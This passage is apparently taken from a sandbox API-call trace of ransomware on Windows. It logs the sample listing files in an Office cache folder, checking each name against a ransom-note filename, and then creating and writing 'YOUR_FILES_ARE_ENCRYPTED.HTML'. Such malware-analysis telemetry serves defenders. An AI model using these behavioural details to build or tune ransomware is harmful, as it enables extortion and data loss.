ftCreationTime.dwLowDateTime=0x82c85c72, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82c85c72, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82c8700a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3894, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="D69FD789-7AAA-4B6A-86DB-6AD5F309B97F", cAlternateFileName="D69FD7~1")) returned 1 [0111.390] StrStrIW (lpFirst="D69FD789-7AAA-4B6A-86DB-6AD5F309B97F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.390] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\D69FD789-7AAA-4B6A-86DB-6AD5F309B97F") returned 157 [0111.390] PathFindExtensionW (pszPath="D69FD789-7AAA-4B6A-86DB-6AD5F309B97F") returned="" [0111.390] lstrlenW (lpString="") returned 0 [0111.390] PathFindExtensionW (pszPath="D69FD789-7AAA-4B6A-86DB-6AD5F309B97F") returned="" [0111.390] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e43432, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4e43432, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4e43432, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x6f72, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="D7F62263-4202-4285-AB58-35DFBBB7899C", cAlternateFileName="D7F622~1")) returned 1 [0111.390] StrStrIW (lpFirst="D7F62263-4202-4285-AB58-35DFBBB7899C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.390] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\D7F62263-4202-4285-AB58-35DFBBB7899C") returned 157 [0111.390] PathFindExtensionW (pszPath="D7F62263-4202-4285-AB58-35DFBBB7899C") returned="" [0111.390] lstrlenW (lpString="") returned 0 [0111.390] PathFindExtensionW (pszPath="D7F62263-4202-4285-AB58-35DFBBB7899C") returned="" [0111.390] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc856808a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc856808a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc856808a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="DB4F9AB3-289C-4C85-93DC-C7725673E79B", cAlternateFileName="DB4F9A~1")) returned 1 [0111.390] StrStrIW (lpFirst="DB4F9AB3-289C-4C85-93DC-C7725673E79B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.390] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\DB4F9AB3-289C-4C85-93DC-C7725673E79B") returned 157 [0111.390] PathFindExtensionW (pszPath="DB4F9AB3-289C-4C85-93DC-C7725673E79B") returned="" [0111.390] lstrlenW (lpString="") returned 0 [0111.390] PathFindExtensionW (pszPath="DB4F9AB3-289C-4C85-93DC-C7725673E79B") returned="" [0111.390] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d69f78, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82d69f78, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82d69f78, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2913, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="DC2A3CBD-DDE4-4C82-98B2-97C578971471", cAlternateFileName="DC2A3C~1")) returned 1 [0111.390] StrStrIW (lpFirst="DC2A3CBD-DDE4-4C82-98B2-97C578971471", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.391] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\DC2A3CBD-DDE4-4C82-98B2-97C578971471") returned 157 [0111.391] PathFindExtensionW (pszPath="DC2A3CBD-DDE4-4C82-98B2-97C578971471") returned="" [0111.391] lstrlenW (lpString="") returned 0 [0111.391] PathFindExtensionW (pszPath="DC2A3CBD-DDE4-4C82-98B2-97C578971471") returned="" [0111.391] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8236c395, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x8236c395, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x8236d693, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1362, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="DE658556-3914-471F-AB71-A05688E0F5A3", cAlternateFileName="DE6585~1")) returned 1 [0111.391] StrStrIW (lpFirst="DE658556-3914-471F-AB71-A05688E0F5A3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.391] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\DE658556-3914-471F-AB71-A05688E0F5A3") returned 157 [0111.391] PathFindExtensionW (pszPath="DE658556-3914-471F-AB71-A05688E0F5A3") returned="" [0111.391] lstrlenW (lpString="") returned 0 [0111.391] PathFindExtensionW (pszPath="DE658556-3914-471F-AB71-A05688E0F5A3") returned="" [0111.391] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89439d3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc89439d3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc89439d3, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2516, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="E2B74C9D-38F9-4AF3-849B-6F6ED185FFC9", cAlternateFileName="E2B74C~1")) returned 1 [0111.391] StrStrIW (lpFirst="E2B74C9D-38F9-4AF3-849B-6F6ED185FFC9", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.391] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\E2B74C9D-38F9-4AF3-849B-6F6ED185FFC9") returned 157 [0111.391] PathFindExtensionW (pszPath="E2B74C9D-38F9-4AF3-849B-6F6ED185FFC9") returned="" [0111.391] lstrlenW (lpString="") returned 0 [0111.391] PathFindExtensionW (pszPath="E2B74C9D-38F9-4AF3-849B-6F6ED185FFC9") returned="" [0111.391] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e4e325, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4e4e325, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4e4f6b9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xa99, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="E36912C5-9C2D-452F-95F8-CFA1FC049148", cAlternateFileName="E36912~1")) returned 1 [0111.391] StrStrIW (lpFirst="E36912C5-9C2D-452F-95F8-CFA1FC049148", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.391] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\E36912C5-9C2D-452F-95F8-CFA1FC049148") returned 157 [0111.391] PathFindExtensionW (pszPath="E36912C5-9C2D-452F-95F8-CFA1FC049148") returned="" [0111.391] lstrlenW (lpString="") returned 0 [0111.391] PathFindExtensionW (pszPath="E36912C5-9C2D-452F-95F8-CFA1FC049148") returned="" [0111.391] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823d78f6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x823d78f6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x823d78f6, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3be8, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="E3CD1B9C-3D05-40E8-A921-F7480789345C", cAlternateFileName="E3CD1B~1")) returned 1 [0111.391] StrStrIW (lpFirst="E3CD1B9C-3D05-40E8-A921-F7480789345C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.391] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\E3CD1B9C-3D05-40E8-A921-F7480789345C") returned 157 [0111.391] PathFindExtensionW (pszPath="E3CD1B9C-3D05-40E8-A921-F7480789345C") returned="" [0111.391] lstrlenW (lpString="") returned 0 [0111.391] PathFindExtensionW (pszPath="E3CD1B9C-3D05-40E8-A921-F7480789345C") returned="" [0111.391] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8850b3e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8850b3e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8850b3e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x38f, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="E457C019-B991-4CCC-8425-CCD48E271DFC", cAlternateFileName="E457C0~1")) returned 1 [0111.391] StrStrIW (lpFirst="E457C019-B991-4CCC-8425-CCD48E271DFC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.391] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\E457C019-B991-4CCC-8425-CCD48E271DFC") returned 157 [0111.392] PathFindExtensionW (pszPath="E457C019-B991-4CCC-8425-CCD48E271DFC") returned="" [0111.392] lstrlenW (lpString="") returned 0 [0111.392] PathFindExtensionW (pszPath="E457C019-B991-4CCC-8425-CCD48E271DFC") returned="" [0111.392] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e928f1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4e928f1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4e93c87, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1f40, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="E64AA1EE-3ABD-40DD-9A7A-E7E891151C82", cAlternateFileName="E64AA1~1")) returned 1 [0111.392] StrStrIW (lpFirst="E64AA1EE-3ABD-40DD-9A7A-E7E891151C82", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.392] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\E64AA1EE-3ABD-40DD-9A7A-E7E891151C82") returned 157 [0111.392] PathFindExtensionW (pszPath="E64AA1EE-3ABD-40DD-9A7A-E7E891151C82") returned="" [0111.392] lstrlenW (lpString="") returned 0 [0111.392] PathFindExtensionW (pszPath="E64AA1EE-3ABD-40DD-9A7A-E7E891151C82") returned="" [0111.392] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bd5ee3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82bd5ee3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82bd85f4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3380, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="E8B41E01-FE51-4F72-9829-70D724467D17", cAlternateFileName="E8B41E~1")) returned 1 [0111.392] StrStrIW (lpFirst="E8B41E01-FE51-4F72-9829-70D724467D17", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.392] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\E8B41E01-FE51-4F72-9829-70D724467D17") returned 157 [0111.392] PathFindExtensionW (pszPath="E8B41E01-FE51-4F72-9829-70D724467D17") returned="" [0111.392] lstrlenW (lpString="") returned 0 [0111.392] PathFindExtensionW (pszPath="E8B41E01-FE51-4F72-9829-70D724467D17") returned="" [0111.392] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x828e0afe, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x828e0afe, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x828e5948, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x5505, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="E96E52D5-188C-4EB0-9DDA-A6190F9D898E", cAlternateFileName="E96E52~1")) returned 1 [0111.392] StrStrIW (lpFirst="E96E52D5-188C-4EB0-9DDA-A6190F9D898E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.392] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\E96E52D5-188C-4EB0-9DDA-A6190F9D898E") returned 157 [0111.392] PathFindExtensionW (pszPath="E96E52D5-188C-4EB0-9DDA-A6190F9D898E") returned="" [0111.392] lstrlenW (lpString="") returned 0 [0111.392] PathFindExtensionW (pszPath="E96E52D5-188C-4EB0-9DDA-A6190F9D898E") returned="" [0111.392] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabb679a6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xabb679a6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xabb679a6, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x292e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="EA6554FC-7DB2-4685-948E-52402E811540", cAlternateFileName="EA6554~1")) returned 1 [0111.392] StrStrIW (lpFirst="EA6554FC-7DB2-4685-948E-52402E811540", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.392] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\EA6554FC-7DB2-4685-948E-52402E811540") returned 157 [0111.392] PathFindExtensionW (pszPath="EA6554FC-7DB2-4685-948E-52402E811540") returned="" [0111.392] lstrlenW (lpString="") returned 0 [0111.393] PathFindExtensionW (pszPath="EA6554FC-7DB2-4685-948E-52402E811540") returned="" [0111.393] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8424f42, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xc8424f42, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc8427531, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x153e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="F0A28B79-40AC-459C-968D-4F68E9798715", cAlternateFileName="F0A28B~1")) returned 1 [0111.393] StrStrIW (lpFirst="F0A28B79-40AC-459C-968D-4F68E9798715", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.393] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\F0A28B79-40AC-459C-968D-4F68E9798715") returned 157 [0111.393] PathFindExtensionW (pszPath="F0A28B79-40AC-459C-968D-4F68E9798715") returned="" [0111.393] lstrlenW (lpString="") returned 0 [0111.393] PathFindExtensionW (pszPath="F0A28B79-40AC-459C-968D-4F68E9798715") returned="" [0111.393] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x829bd95b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x829bd95b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x829bef86, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x7629, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="F192A1E6-5284-47FF-83DA-D65DCB35FC9F", cAlternateFileName="F192A1~1")) returned 1 [0111.393] StrStrIW (lpFirst="F192A1E6-5284-47FF-83DA-D65DCB35FC9F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.393] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\F192A1E6-5284-47FF-83DA-D65DCB35FC9F") returned 157 [0111.393] PathFindExtensionW (pszPath="F192A1E6-5284-47FF-83DA-D65DCB35FC9F") returned="" [0111.393] lstrlenW (lpString="") returned 0 [0111.393] PathFindExtensionW (pszPath="F192A1E6-5284-47FF-83DA-D65DCB35FC9F") returned="" [0111.393] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaba00b7d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xaba00b7d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xaba00b7d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x18bd, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="F31F431A-DF78-48BC-9A30-E15E83A7DF3B", cAlternateFileName="F31F43~1")) returned 1 [0111.393] StrStrIW (lpFirst="F31F431A-DF78-48BC-9A30-E15E83A7DF3B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.393] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\F31F431A-DF78-48BC-9A30-E15E83A7DF3B") returned 157 [0111.393] PathFindExtensionW (pszPath="F31F431A-DF78-48BC-9A30-E15E83A7DF3B") returned="" [0111.393] lstrlenW (lpString="") returned 0 [0111.393] PathFindExtensionW (pszPath="F31F431A-DF78-48BC-9A30-E15E83A7DF3B") returned="" [0111.393] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4df95, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x82d4df95, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x82d4df95, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1362, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="F8C7174F-633A-4FA0-9187-67153391986A", cAlternateFileName="F8C717~1")) returned 1 [0111.393] StrStrIW (lpFirst="F8C7174F-633A-4FA0-9187-67153391986A", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.393] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\F8C7174F-633A-4FA0-9187-67153391986A") returned 157 [0111.393] PathFindExtensionW (pszPath="F8C7174F-633A-4FA0-9187-67153391986A") returned="" [0111.393] lstrlenW (lpString="") returned 0 [0111.393] PathFindExtensionW (pszPath="F8C7174F-633A-4FA0-9187-67153391986A") returned="" [0111.393] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4c2675f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb4c2675f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb4c2675f, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x447b, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="F97CF839-8F66-44ED-8DB4-5A4D6D408F2E", cAlternateFileName="F97CF8~1")) returned 1 [0111.393] StrStrIW (lpFirst="F97CF839-8F66-44ED-8DB4-5A4D6D408F2E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.393] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\F97CF839-8F66-44ED-8DB4-5A4D6D408F2E") returned 157 [0111.393] PathFindExtensionW (pszPath="F97CF839-8F66-44ED-8DB4-5A4D6D408F2E") returned="" [0111.393] lstrlenW (lpString="") returned 0 [0111.393] PathFindExtensionW (pszPath="F97CF839-8F66-44ED-8DB4-5A4D6D408F2E") returned="" [0111.393] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb49ec6e1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb49ec6e1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb49eda26, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x486e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="FDAC0094-8C06-4BE5-856F-0DB7BB8F69B9", cAlternateFileName="FDAC00~1")) returned 1 [0111.393] StrStrIW (lpFirst="FDAC0094-8C06-4BE5-856F-0DB7BB8F69B9", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.393] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\FDAC0094-8C06-4BE5-856F-0DB7BB8F69B9") returned 157 [0111.393] PathFindExtensionW (pszPath="FDAC0094-8C06-4BE5-856F-0DB7BB8F69B9") returned="" [0111.393] lstrlenW (lpString="") returned 0 [0111.394] PathFindExtensionW (pszPath="FDAC0094-8C06-4BE5-856F-0DB7BB8F69B9") returned="" [0111.394] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb49ec6e1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xb49ec6e1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xb49eda26, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x486e, dwReserved0=0x6f1128, dwReserved1=0x632a10, cFileName="FDAC0094-8C06-4BE5-856F-0DB7BB8F69B9", cAlternateFileName="FDAC00~1")) returned 0 [0111.394] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0111.395] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 150 [0111.395] GetProcessHeap () returned 0x600000 [0111.395] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3112fd0 [0111.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\binaries.templates.cdn.office.net\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\office\\16.0\\webservicecache\\allusers\\binaries.templates.cdn.office.net\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0111.396] WriteFile (in: hFile=0x318, lpBuffer=0x3112fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x3112fd0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) 